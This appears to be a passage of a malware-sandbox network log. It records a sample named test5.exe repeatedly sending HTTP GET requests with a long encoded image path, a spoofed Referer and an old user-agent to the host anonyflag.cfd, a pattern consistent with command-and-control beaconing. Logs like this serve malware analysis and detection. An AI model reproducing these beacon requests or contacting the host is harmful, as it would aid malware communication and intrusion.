                    2024-12-28 10:37:10 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:11 UTC880INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:10 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: HIT
                    Age: 1
                    Last-Modified: Sat, 28 Dec 2024 10:37:09 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sFFM4zSGXIKH5VFyfJrdF1v3ckUFCsSqmeowY6krhRa0G5fM5sy9MTE2CcN4cLQAKjgAg2fdvHu56Y2C1559mW2C7QpbLQXIwx0Bzz3JgUO2%2FWi%2FDv%2FNs27br537u1Ln"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e9deca8443c9-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1708&rtt_var=640&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1709601&cwnd=230&unsent_bytes=0&cid=1558d88f03ea14ac&ts=452&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    38192.168.2.449807104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:12 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:12 UTC884INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:12 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:12 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q2UPrFh1rKfwRmW1%2BvgwJKX%2Fh1qHznr4IK02OUAsTkI3VSOBHy0xoF4mA%2FSACjnfhK3%2FTKQm1xpWA%2FljmUJ53VpfIh84AGhVYs0Z0x5LSfFl0v%2FzZMZ0ta1%2FUZHOP609"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e9ea3d158cb1-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1961&min_rtt=1956&rtt_var=744&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1460730&cwnd=186&unsent_bytes=0&cid=88e5f6fb0f7dfab2&ts=516&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    39192.168.2.449813104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:14 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:14 UTC872INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:14 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:14 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3iqqGOosSk2aCXSrc2RvXZsoifjpxuMp5xkfp8rL6WA7CXTj4m%2BUkjy0BJ8aAtOAWf9hFypbu09e0vYxXCr0buWwUB8czHKk2NFrxfI7LqvdtSUkSCo8OD6gsbkisg69"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e9f609ac41ed-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1574&rtt_var=612&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1754807&cwnd=211&unsent_bytes=0&cid=fafee171f8c866b0&ts=500&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    40192.168.2.449815104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:16 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:16 UTC880INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:16 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:16 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4fy7oCiG73O%2FSIefKN1qhWopqk%2FgKoB6vW00DrqueOgdMX0cWuHH%2Bxac5vZLbv0Va%2BtmdpET85ZZkFE6CfVSTtzSBrBWCVxvbN4bohSl09K2YG%2Bp7Urvk3zrDN8k9T95"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90ea01c8ff41a1-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=2027&min_rtt=2020&rtt_var=772&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1403846&cwnd=229&unsent_bytes=0&cid=e33d78032a4a8ed7&ts=505&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    41192.168.2.449821104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:18 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:18 UTC875INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:18 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:18 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JZOHG3DJo8LuU7HmUi7eJQE%2BDsjduaYm8cW3s4IRGCAeqaIibvIDkvx8WNBncTPs2n7KTret19QoaxuVWsRONjls4Oiyqo%2BFw5VERDrkRTTGCdh8yWZOHw7A6FZybI%2F2"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90ea0d8fe219aa-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1965&rtt_var=742&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1468812&cwnd=32&unsent_bytes=0&cid=38f28d1bb634c68d&ts=501&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    42192.168.2.449826104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:19 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:20 UTC880INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:20 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:20 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tnro8%2BKKr0Ucjhq%2BfwbYhOHVkDObwAz8pYTLX9C0k7d4fUGnZsNLWLUNp%2FKjr%2BLkprQ4UEEecHMQT7iYvZJz5PePVcYUhXKglgcx4iwefPidpWBSHXThEhNyM%2Bhg9Esb"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90ea18e86e8c17-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1769&rtt_var=680&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1590413&cwnd=240&unsent_bytes=0&cid=99ece412729a1960&ts=498&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    43192.168.2.449832104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:21 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:22 UTC876INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:22 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:22 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OwMUxPFoHtMLqFKohjxRq%2FZDV48ClnUdWcYqwUUaJrYnvNu%2BIns0Fhkv3Sq78aqS6k4gsqpKR%2FRDXP7E56h3ui0eQZxEJ7Pl7HNC1mQOQx7BSWfGe9K8qhoHJHoGp26S"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90ea248a8d7cb1-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1819&rtt_var=684&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1599123&cwnd=235&unsent_bytes=0&cid=bed853743a0a1119&ts=503&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    44192.168.2.449838104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:23 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:24 UTC886INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:23 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: HIT
                    Age: 1
                    Last-Modified: Sat, 28 Dec 2024 10:37:22 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wlqXBwxzoCjfbhFZqW289Y8QzzNy%2FX7BDBqQB6diOehwgC%2B%2FMPZfeRCIZg8cT6rTCHzQ41sAdr0ja0uw7x6VmSUSwJSq%2FFlwZPNXkG%2F5BDeYMRKv0CSG%2Bm3SphdMY8r4"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90ea30389aef9f-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1957&rtt_var=764&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1492079&cwnd=219&unsent_bytes=0&cid=6e47d755d414e3b2&ts=456&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    45192.168.2.449844104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:25 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:25 UTC872INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:25 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:25 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DGLV2Znrf7hUkQ5ihtb1CSPfdPNmDgjRMPmx6Ai589p5rXCBGZFZ7jZvKMEJVkew23EyzdZXpl2%2FeqEFPZYhLCKohzplq4BHQK1rpeEIBJEXDzBxt0w2ZiANQYJWvH3p"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90ea3b5fa343fd-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1662&rtt_var=632&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1720683&cwnd=217&unsent_bytes=0&cid=a5ce4d60f9c81d20&ts=495&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    46192.168.2.449846104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:27 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:27 UTC876INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:27 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:27 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lW%2Fhl4rva12zLIzNY5hxssriVRDHHOeFRPVXwPrgpDhe5Wn3A6efwIabZ9HMYVbEDUsgnAb61X24g%2BpJsmtMg0zfQsytDzfxveSHKYAK5gyRb4z858%2Fc5xALY48qkvDC"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90ea47190341ec-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1592&rtt_var=609&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1777236&cwnd=221&unsent_bytes=0&cid=06c47503e70aefe7&ts=502&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    47192.168.2.449852104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:29 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:29 UTC872INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:29 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:29 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ctwCQ5SVK958HEhF8VLoWM1AcI8SubmorgwFEvFg4awSmxXCifwTDYWuP6EHJkKZ5aHXvExLfSskm1IdTHXdm096cGkVq3Y3MqhqqpelVU3VxW7Hlz%2BCu7pesawbhkYY"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90ea5279060c88-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1730&min_rtt=1724&rtt_var=660&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1642294&cwnd=217&unsent_bytes=0&cid=df03a46aef057547&ts=493&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    48192.168.2.449857104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:30 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:31 UTC872INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:31 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:31 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bnkZWw%2BxEvDV2YMp3RtW7vfyy4lPpx3AnaA9GiP2oAxkvpheBRp6Vs236nXYhp8M3LsBnqxHRCxiNPVxoc0Ylxh0tnoKiPloYKYWuAqiYXtF1qMljIu8iyr3f92j9oac"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90ea5e29970f93-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1624&rtt_var=626&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1722713&cwnd=168&unsent_bytes=0&cid=9d5392826a350c89&ts=503&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    49192.168.2.449863104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:32 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:33 UTC876INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:33 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:33 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tPbBgHs%2F%2Bf0Fv41tGcVUESAv68Jb3X2jBMqm50w1fDaQhnKQlLwi3GIn0fm0BVWWsun5RyQZuMyPspQ%2FjALH7Mzp88XnHIgEHpewba58zUEpXb1seQrELNOx46GlqbfR"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90ea6a291b0f74-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1484&rtt_var=558&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1955793&cwnd=151&unsent_bytes=0&cid=ae9eb22cbc64eff2&ts=514&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    50192.168.2.449869104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:34 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:35 UTC878INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:35 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
